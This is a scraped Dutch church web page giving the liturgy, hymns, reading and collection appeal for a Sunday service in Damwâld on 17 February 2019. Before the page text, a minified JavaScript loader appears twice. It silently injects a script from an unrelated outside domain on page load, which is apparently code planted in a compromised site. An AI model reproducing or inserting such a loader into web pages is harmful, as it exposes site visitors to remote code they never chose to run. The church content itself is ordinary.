;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerkdienst zondag 17 februari 2019 9:30 uur - PKN Damwâld
zondag 17 februari 2019
09:30 uur

Kerkdienst zondag 17 februari 2019 9:30 uur

Informatie

Voorganger:G.J. Otter
Organist:Nienke van der Heide-Visser
Liturgie
Lied voor de dienst Gezang 257 : 1
Welkom
Intochtslied : Psalm 105 : 1 en 2
Stil gebed, Votum en groet
We zingen: ELB 448: 1 en 2
Wetslezing .
We zingen: GEZ.440:1 EN 2
Gebed
We lezen: Mc.4: 26 - 41
We zingen: Psalm 124 : 1 en 4
Preek .
We zingen: Elb 187: 1, 2 en 3
Dankzegging en voorbede
Collecte
Slotlied Gezang 479 : 1 en 4
Zegen
Liturgie met de liedteksten is alleen beschikbaar met een Mijn Kerk account. Inloggen
Locatie: Bonifatiuskerk Foarwei 2, Damwâld
Dienst terugluisteren Dienst terugluisteren
Collecte informatie
Eerste collecte: Droogte overleven in Ethiopië (Noodhulp)

Ethiopiërs zijn droogte van oudsher gewend, maar door klimaatverandering is het steeds vaker en langer extreem droog. Gezinnen komen in grote nood: water en voedselvoorraden raken op, vee sterft. Samen met lokale Ethiopische partners helpt Kerk in Actie boerengezinnen om ook in extreme tijden te overleven. Ze leren bv. over irrigatie, krijgen zaden die goed tegen droogte kunnen, leggen waterbronnen aan en worden gestimuleerd geld te verdienen met kleine handeltjes in bv. zeep of snacks.

Tweede collecte: Kerk
Uitganscollecte: Kerk